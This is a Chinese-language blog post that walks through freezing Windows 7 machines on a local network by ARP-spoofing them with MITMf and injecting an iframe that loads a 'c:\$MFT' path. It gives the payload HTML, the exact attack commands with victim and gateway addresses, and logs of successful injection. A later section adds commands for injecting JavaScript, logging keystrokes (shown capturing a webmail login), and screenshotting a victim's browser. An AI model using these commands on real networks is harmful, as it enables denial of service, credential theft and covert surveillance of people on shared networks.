<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="$MFT漏洞," />





  <link rel="alternate" href="/atom.xml" title="h1tler's blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.ico?v=5.1.2" />






<meta name="description" content="由签名Alladin信息研究员Anatolymik（俄语）发现的bug 允许通过简单的文件调用来阻止Windows 7和8.1系统。 $ MFT，当我们访问例如C：\ $ MFT \ hello.txt时，NTFS文件系统（NTFS）在该资源中创建一个块并且不让它去。NT文件系统就会锁定整个C盘，由于C盘为系统盘，从而导致整个系统被锁定。 此漏洞可以在本地利用，也可以通过Internet Expl">
<meta name="keywords" content="$MFT漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="通过MITMf利用$MFT漏洞锁定局域网电脑">
<meta property="og:url" content="https://blog.cuittk.cn/2018/03/12/通过MITMf利用$MFT漏洞锁定局域网电脑/index.html">
<meta property="og:site_name" content="h1tler&#39;s blog">
<meta property="og:description" content="由签名Alladin信息研究员Anatolymik（俄语）发现的bug 允许通过简单的文件调用来阻止Windows 7和8.1系统。 $ MFT，当我们访问例如C：\ $ MFT \ hello.txt时，NTFS文件系统（NTFS）在该资源中创建一个块并且不让它去。NT文件系统就会锁定整个C盘，由于C盘为系统盘，从而导致整个系统被锁定。 此漏洞可以在本地利用，也可以通过Internet Expl">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://img.cdn.cuittk.cn/utgklomsh1pjh2ed8rt8b0zhvv.png">
<meta property="og:image" content="http://img.cdn.cuittk.cn/5cbw9573p3cy2ko6162ejg3jcq.png">
<meta property="og:image" content="http://img.cdn.cuittk.cn/fgzrhguiay808tce5iea9zc0g4.png">
<meta property="og:image" content="http://img.cdn.cuittk.cn/jdbx25zst1hh0d31zaw3dfn3r3.png">
<meta property="og:image" content="http://img.cdn.cuittk.cn/ertmxnbp4lz3eskmppdh3ga0v0.png">
<meta property="og:image" content="http://img.cdn.cuittk.cn/9psqsr093ki0mgwkzodsuengvt.png">
<meta property="og:updated_time" content="2020-02-26T10:42:49.668Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="通过MITMf利用$MFT漏洞锁定局域网电脑">
<meta name="twitter:description" content="由签名Alladin信息研究员Anatolymik（俄语）发现的bug 允许通过简单的文件调用来阻止Windows 7和8.1系统。 $ MFT，当我们访问例如C：\ $ MFT \ hello.txt时，NTFS文件系统（NTFS）在该资源中创建一个块并且不让它去。NT文件系统就会锁定整个C盘，由于C盘为系统盘，从而导致整个系统被锁定。 此漏洞可以在本地利用，也可以通过Internet Expl">
<meta name="twitter:image" content="http://img.cdn.cuittk.cn/utgklomsh1pjh2ed8rt8b0zhvv.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.2',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://blog.cuittk.cn/2018/03/12/通过MITMf利用$MFT漏洞锁定局域网电脑/"/>




<link rel="stylesheet" href="/js/prism/prism.css">
  <title>通过MITMf利用$MFT漏洞锁定局域网电脑 | h1tler's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">h1tler's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://blog.cuittk.cn/2018/03/12/通过MITMf利用$MFT漏洞锁定局域网电脑/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="h1tler">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/2.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="h1tler's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">通过MITMf利用$MFT漏洞锁定局域网电脑</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-03-12T12:34:14+08:00">
                2018-03-12
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web安全/" itemprop="url" rel="index">
                    <span itemprop="name">web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>由签名Alladin信息研究员Anatolymik（俄语）发现的bug 允许通过简单的文件调用来阻止Windows 7和8.1系统。</p>
<p>$ MFT，当我们访问例如C：\ $ MFT \ hello.txt时，NTFS文件系统（NTFS）在该资源中创建一个块并且不让它去。<a href="https://es.wikipedia.org/wiki/NTFS" target="_blank" rel="external">NT文件系统</a>就会锁定整个C盘，由于C盘为系统盘，从而导致整个系统被锁定。</p>
<p>此漏洞可以在本地利用，也可以通过Internet Explorer或Firefox远程利用，Chrome不易受到攻击，虽然我们可以诱使用户进入为利用此漏洞而创建的页面，但我们也可以使用MITMF强制执行此漏洞。</p>
<h2 id="准备环境"><a href="#准备环境" class="headerlink" title="准备环境"></a>准备环境</h2><p>我们将使用Windows 7机器，地址IP 192.168.1.67和Kali Linux机器，使用IP地址192.168.1.111，网关IP 192.168.1.254<br><img src="http://img.cdn.cuittk.cn/utgklomsh1pjh2ed8rt8b0zhvv.png" alt=""></p>
<p>由于我们需要提供恶意代码，因此我们将按照以下方式在我们的Kali机器上传apache2：</p>
<blockquote>
<p>root@kali:~# /etc/init.d/apache2 start<br>[ ok ] Starting apache2 (via systemctl): apache2.service.<br>root@kali:~#</p>
</blockquote>
<p>我们还需要一个包含对$ MFT的调用的html文件，以便我们可以将其注入到iframe中以供我们的受害者使用。<br>我们将把这个文件放在nice.html中，我们必须将它放在/ var / www / html中</p>
<pre><code class="language-html">root@kali:/var/www/html# ls
index.html  nice.html
root@kali:/var/www/html# cat nice.html 
&lt;html&gt;
&lt;img src=&quot;c:\$MFT\123&quot; alt=&quot;Smiley face&quot; height=&quot;42&quot; width=&quot;42&quot;&gt;
&lt;/html&gt;
root@kali:/var/www/html#
</code></pre>
<p>该html文件非常简单，但它完美地完成了任务。<br>有了这个，我们准备发起攻击。</p>
<h2 id="发起攻击"><a href="#发起攻击" class="headerlink" title="发起攻击"></a>发起攻击</h2><p>我们必须做的第一件事是确认我们的服务器已启动</p>
<pre><code class="language-html">root@kali:/var/www/html# /etc/init.d/apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Tue 2017-05-30 12:16:16 EDT; 5min ago
  Process: 1104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 1115 (apache2)
    Tasks: 7 (limit: 4915)
   CGroup: /system.slice/apache2.service
           ├─1115 /usr/sbin/apache2 -k start
           ├─1133 /usr/sbin/apache2 -k start
           ├─1134 /usr/sbin/apache2 -k start
           ├─1135 /usr/sbin/apache2 -k start
           ├─1136 /usr/sbin/apache2 -k start
           ├─1137 /usr/sbin/apache2 -k start
           └─1138 /usr/sbin/apache2 -k start

May 30 12:16:15 kali systemd[1]: Starting The Apache HTTP Server...
May 30 12:16:16 kali apachectl[1104]: AH00558: apache2: Could not reliably determine the server&#39;s fully qualified domain name, using 127.0.1.1. Set the &#39;ServerName&#39; d…s this message
May 30 12:16:16 kali systemd[1]: Started The Apache HTTP Server.
Hint: Some lines were ellipsized, use -l to show in full.
</code></pre>
<p>一旦这部分被验证，我们可以启动MITMf来将这个html注入到我们的受害者中，命令如下</p>
<pre><code class="language-html">root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html
</code></pre>
<p>在这里，我们告诉MITMf做出欺骗网关192.168.1.254，我们受害者的机器是192.168.1.67，我们希望以注入HTML http:\//192.168.1.111/nice.html我们受害者的浏览器。</p>
<pre><code class="language-html">python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http:\//192.168.1.111/nice.html
</code></pre>
<p>该命令的输出应与以下内容类似:</p>
<pre><code class="language-html">root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html

@@@@@@@@@@   @@@  @@@@@@@  @@@@@@@@@@   @@@@@@@@  
@@@@@@@@@@@  @@@  @@@@@@@  @@@@@@@@@@@  @@@@@@@@  
@@! @@! @@!  @@!    @@!    @@! @@! @@!  @@!       
!@! !@! !@!  !@!    !@!    !@! !@! !@!  !@!       
@!! !!@ @!@  !!@    @!!    @!! !!@ @!@  @!!!:!    
!@!   ! !@!  !!!    !!!    !@!   ! !@!  !!!!!:    
!!:     !!:  !!:    !!:    !!:     !!:  !!:       
&lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot;❗&quot; src=&quot;https://s.w.org/images/core/emoji/2.3/svg/2757.svg&quot; scale=&quot;0&quot;&gt;     &lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot;❗&quot; src=&quot;https://s.w.org/images/core/emoji/2.3/svg/2757.svg&quot; scale=&quot;0&quot;&gt;  &lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot;❗&quot; src=&quot;https://s.w.org/images/core/emoji/2.3/svg/2757.svg&quot; scale=&quot;0&quot;&gt;    &lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot;❗&quot; src=&quot;https://s.w.org/images/core/emoji/2.3/svg/2757.svg&quot; scale=&quot;0&quot;&gt;    &lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot;❗&quot; src=&quot;https://s.w.org/images/core/emoji/2.3/svg/2757.svg&quot; scale=&quot;0&quot;&gt;     &lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot;❗&quot; src=&quot;https://s.w.org/images/core/emoji/2.3/svg/2757.svg&quot; scale=&quot;0&quot;&gt;  &lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot;❗&quot; src=&quot;https://s.w.org/images/core/emoji/2.3/svg/2757.svg&quot; scale=&quot;0&quot;&gt;       
:::     ::    ::     ::    :::     ::    ::       
 :      :    :       :      :      :     :        

[*] MITMf v0.9.8 - &#39;The Dark Side&#39;
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
Error starting HTTP server: [Errno 98] Address already in use
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online
</code></pre>
<p>当我们的受害者访问任何页面时，MITMf会尝试将我们的html注入浏览器。</p>
<pre><code class="language-html">2017-05-30 12:27:07 192.168.1.67 [type:IE-8 os:Windows 7] www.bing.com
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] elpais.com.co
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co
2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] sso.elpais.com.co
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.googletagservices.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.google.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s7.addthis.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] code3.adtlgc.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] tag.navdmp.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] raw.githack.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] b.scorecardresearch.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] cdn.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] comcluster.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:Other-Other os:Other] g.symcd.com
2017-05-30 12:27:34 192.168.1.67 [type:Other-Other os:Other] clients1.google.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.gstatic.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] tpc.googlesyndication.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: tpc.googlesyndication.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:35 192.168.1.67 [type:IE-8 os:Windows 7] 192.168.1.111
</code></pre>
<p>我们可以看到Iframe被成功注入了好几次</p>
<pre><code class="language-html">2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co
2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co
</code></pre>
<p>这告诉我们html注入成功了，所以我们的受害者必须在他的团队中感受到巨大的缓慢<br><img src="http://img.cdn.cuittk.cn/5cbw9573p3cy2ko6162ejg3jcq.png" alt=""><br>目前，我们的用户必须重新启动计算机，当它连接回共享资源时，我们可以使用它来捕获密码。</p>
<h2 id="扩展学习："><a href="#扩展学习：" class="headerlink" title="扩展学习："></a>扩展学习：</h2><p>MITMF基本功能：cookies盗取，dns劫持，js注入…</p>
<h3 id="MITMF工具实战测试"><a href="#MITMF工具实战测试" class="headerlink" title="MITMF工具实战测试"></a>MITMF工具实战测试</h3><p>环境：windows 7机器 ip地址：192.168.123.162  Kali Linux 机器 ip地址：192.168.123.6  默认网关ip: 192.168.123.1</p>
<h4 id="Inject注入模块"><a href="#Inject注入模块" class="headerlink" title="Inject注入模块"></a>Inject注入模块</h4><p>可以向被欺骗者的浏览内容中注入各种猥琐的东西，比如js啦，html啦，图片啦，小电影啦<br>注入一个html(上文以及说了)<br>注入一个js：</p>
<pre><code class="language-html">python ./mitmf.py -i eth0 --spoof --arp --gateway 192.168.123.1 --target 192.168.123.162 --inject --js-url http://www.xxx.com/test.js
</code></pre>
<h4 id="JSKeylogger模块"><a href="#JSKeylogger模块" class="headerlink" title="JSKeylogger模块"></a>JSKeylogger模块</h4><p>一个键盘记录js,工具自带的keylogger的js:</p>
<pre><code class="language-html">python ./mitmf.py -i eth0 --spoof --arp --gateway 192.168.123.1 --target 192.168.123.162 --jskeylogger
</code></pre>
<p>测试登录新浪邮箱（取消勾选全程加密）<br><img src="http://img.cdn.cuittk.cn/fgzrhguiay808tce5iea9zc0g4.png" alt=""><br><img src="http://img.cdn.cuittk.cn/jdbx25zst1hh0d31zaw3dfn3r3.png" alt=""></p>
<h4 id="Screenshotter模块"><a href="#Screenshotter模块" class="headerlink" title="Screenshotter模块"></a>Screenshotter模块</h4><p>这个可以说是MITMf，甚至是在内网渗透工具中，最高级的功能之一了。支持对目标浏览器进行截屏。可以想象，攻击者将直接看到受害人的浏览截屏，隐私全无！这个插件是基于HTML5写的，默认截屏时间间隔是10s，使用–interval可以设置时间间隔。（不是很实用，保存的图片大多是网站框架图，具体看的什么获取的很慢）</p>
<pre><code class="language-html">python ./mitmf.py -i eth0 --spoof --arp --gateway 192.168.123.1 --target 192.168.123.162 --screen
</code></pre>
<p>受害者正在看新闻。。。<br><img src="http://img.cdn.cuittk.cn/ertmxnbp4lz3eskmppdh3ga0v0.png" alt=""></p>
<h4 id="Upsidedownternet模块-恶搞一下"><a href="#Upsidedownternet模块-恶搞一下" class="headerlink" title="Upsidedownternet模块(恶搞一下)"></a>Upsidedownternet模块(恶搞一下)</h4><p>将受害者浏览器中的图片180度颠倒</p>
<pre><code class="language-html">python ./mitmf.py -i eth0 --spoof  --arp --gateway 192.168.123.1 --target 192.168.123.162 --upsidedownternet
</code></pre>
<p><img src="http://img.cdn.cuittk.cn/9psqsr093ki0mgwkzodsuengvt.png" alt=""></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/MFT漏洞/" rel="tag"># $MFT漏洞</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/03/01/kali_linux下安装MITMF/" rel="next" title="kali_linux下安装MITMF">
                <i class="fa fa-chevron-left"></i> kali_linux下安装MITMF
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/04/22/DDCTF 部分writeup/" rel="prev" title="DDCTF 部分writeup">
                DDCTF 部分writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="vcomments"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          
            <img class="site-author-image" itemprop="image"
              src="/images/2.gif"
              alt="h1tler" />
          
            <p class="site-author-name" itemprop="name">h1tler</p>
            <p class="site-description motion-element" itemprop="description">Youth is wholly experimental</p>
        </div>

        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">58</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">21</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://sancrane.top/" title="sancrane" target="_blank">sancrane</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://myclass.azurewebsites.net/" title="OurClass" target="_blank">OurClass</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://ph0rse.me/" title="ph0rse" target="_blank">ph0rse</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://grassgrass.top/" title="grassgrass" target="_blank">grassgrass</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#准备环境"><span class="nav-number">1.</span> <span class="nav-text">准备环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#发起攻击"><span class="nav-number">2.</span> <span class="nav-text">发起攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#扩展学习："><span class="nav-number">3.</span> <span class="nav-text">扩展学习：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#MITMF工具实战测试"><span class="nav-number">3.1.</span> <span class="nav-text">MITMF工具实战测试</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Inject注入模块"><span class="nav-number">3.1.1.</span> <span class="nav-text">Inject注入模块</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#JSKeylogger模块"><span class="nav-number">3.1.2.</span> <span class="nav-text">JSKeylogger模块</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Screenshotter模块"><span class="nav-number">3.1.3.</span> <span class="nav-text">Screenshotter模块</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Upsidedownternet模块-恶搞一下"><span class="nav-number">3.1.4.</span> <span class="nav-text">Upsidedownternet模块(恶搞一下)</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">h1tler</span>

  
  
  
</div>




<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<script src="/js/prism/prism.js" async></script>
        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 访问总量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=1264590843&web_id=1264590843" language="JavaScript"></script>
  </div>



        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>


  

  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine@1.1.4/dist/Valine.min.js"></script>
  <script type="text/javascript">
    new Valine({
        av: AV,
        el: '#vcomments' ,
        verify: false,
        notify: false,
        appId: 'MpjYiGHS1d0QlJPiqPcvHDY1-gzGzoHsz',
        appKey: 'anlgXscWqVHMh6r0MiUOvmBN',
        placeholder: '请在此输入您的留言',
		avatar: 'mm',
		recordIP: 'true'
    });
  </script>



  





  

  

  

  

  

  

	<!-- 页面点击小红心 -->
	<script type="text/javascript" src="/js/src/love.js"></script>
</body>
</html>
